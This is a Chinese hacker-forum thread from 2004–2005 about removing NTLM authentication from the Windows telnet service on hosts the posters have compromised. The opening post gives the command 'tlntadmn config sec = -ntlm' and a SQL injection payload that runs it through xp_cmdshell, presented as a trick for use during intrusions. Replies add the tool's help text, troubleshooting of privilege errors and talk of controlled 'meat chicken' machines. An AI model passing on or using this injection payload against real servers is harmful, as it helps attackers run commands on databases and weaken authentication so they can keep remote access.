文章作者：紫幻[EST顾问团成员]
信息来源：邪恶八进制 中国

相信大家都对telnet比较熟悉吧。hacking的时候经常用到的系统自带shell尤其是注射的时候，但是最讨厌的就是ntlm认证了，以前大家去掉ntlm的方法一般有2种。

1  上传ntml.exe  这种方法有很多缺点，比如：对方有杀毒软件，很多网段屏蔽了TFTP.

2 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。


今天我给大家介绍我一直在使用的办法，压箱底的哦。

那就是直接运行命令：tlntadmn config sec = -ntlm

注射的话可以直接运行：;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
运行以后就去掉了该死的ntlm认证：） 赶快去试试吧。

最后祝大家圣诞快乐！！！

谢谢大家的支持。以后我研究出什么新东东一定会第一时间发到这里来。

你们的支持就是我最大的源动力！！！

引用:

下面是引用紫幻于2004-12-23 20:02发表的:
谢谢大家的支持。以后我研究出什么新东东一定会第一时间发到这里来。

你们的支持就是我最大的源动力！！！

我发觉E.S.T顾问团成员都有一个特点 就是喜欢伪装成很菜的样子

好是好，说说why？就更好了？？！谢谢。

厉害。。以前的浪客联盟没了。他也消失。

引用:

下面是引用yjd于2005-04-10 12:00发表的:
厉害。。以前的浪客联盟没了。他也消失。

其实他们都工作了

不过幻哥还是偶尔会到邪恶八进制来玩的 只不过不固定时间而已

工作是一种比较摧残人的创造性的事情。

呵呵。谢谢这些兄弟顶我。还知道我是以前浪客的。看来都是老朋友了。其实我天天都来8进制的，只不过我现在喜欢潜水了，偶尔会冒泡：）我最近写了一个文章投稿了，等非安全刊登我马上发到论坛上来。
[s:39]  [s:39]  [s:39]  [s:39]  [s:39]  [s:39]  [s:39]  [s:39]

引用:

下面是引用紫幻于2005-04-11 10:37发表的:
呵呵。谢谢这些兄弟顶我。还知道我是以前浪客的。看来都是老朋友了。其实我天天都来8进制的，只不过我现在喜欢潜水了，偶尔会冒泡：）我最近写了一个文章投稿了，等非安全刊登我马上发到论坛上来。
[s:39]  [s:39]  [s:39]  [s:39]  [s:39]  [s:39]  [s:39]  [s:39]

投稿文章最好3个月后再发到网络 如果实在想提前发 幻哥可以考虑内部版面 密码在群公告里有

  C:\>tlntadmn /?

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue
| -s | -k | -m | config config_options
                  所有会话用 'all'。
    -s sessionid       列出会话的信息。
    -k sessionid       终止会话。
    -m sessionid       发送消息到会话。

    config           配置 telnet 服务器参数。

common_options 为:
    -u user          指定要使用其凭据的用户
    -p password        用户密码

config_options 为:
   dom = domain        设定用户的默认域
   ctrlakeymap = yes|no  设定 ALT 键的映射
   timeout = hh:mm:ss    设定空闲会话超时值
   timeoutactive = yes|no 启用空闲会话。
   maxfail = attempts    设定断开前登录尝试的最多失败数。
   maxconn = connections  设定最大连接数。
   port = number       设定 telnet 端口。
   sec = [+/-]NTLM [+/-]passwd
                  设定身份验证机构
   mode = console|stream  指定操作模式。


功能比较强大的一个外部命令，呵呵，现在才知道
这命令主要是管理TELNET服务的，还可以改TELNET服务的端口，关闭、开启NTLM严正等等好多功能

2000pro的系统，出现如下错误，是怎么回事？
C:\Documents and Settings\Administrator>tlntadmn config sec=-ntlm
错误: 您必须有管理特权

C:\Documents and Settings\Administrator>tlntadmn /?
错误: 您必须有管理特权

呵呵，妙～以前跟着紫纪老大学习，技术突飞猛进！

现在，一个天，一个地的差别～后悔莫级呀～～～

以前浪客的badboy现在会重新站起来的！不会再做

一个拿着别人的工具和脚本漏洞乱搞的人啦！

34楼的，这个本来就是要在有管理权的情况下用的吗？没有管理权，就算你telnet上去了！
有密码给你进去吗？

菜鸟请教：
在win2000下( 默认安装），
以administrator身份运行命令：tlntadmn config sec = -ntlm
返回　错误: 您必须有管理特权
何故？　如何解决？

[s:56] 有没有快速提高技术的方法，至少多WINDOMS2000 CMD所常用的命令做一下简介也好呀

晕了
C:\>tlntadmn
错误: 您必须有管理特权

确实是个好方法，省去了不少麻烦。
一般情况下不敢用tftp了，在X档案中看过一篇利用tftp来记录入侵者IP的信息。
一个假的tftp，不过一般网管也没那么变态。
但是tftp对他们来说有时候没大多用处，他们有管理软件，或者3389等。
不记得将tftp变成记录ip 信息的工具是怎么样实现的了，
有信息的朋友给我发个DOC,谢先了！
[url=hacklife@126.com]E-mail[/url]

想请问下这种方法一般是用在什么情况下的?

应该没这么简单吧。。。。！我TELNET 。FTP从来就没成功过！！！

想请教下
他是在进去肉鸡后才可以尺行的对吧
那么说来对我没什么用了~~~~~~~

tlntadmn config sec = -ntlm
不好意思
这句具体是怎么解释的 啊

24楼：应该是在客户端运行的吧
25楼：tlntadmn config sec ＝ －ntml
tlntadmn是telnet服务器管理程序 这段命令意思应该是：telnet服务端的配置部分要不要设置ntml验证，－ntml就是不要ntml验证。 config：配置

哦！谢谢了！

不是很有用！
还是谢谢了！

呵呵，又得学习了。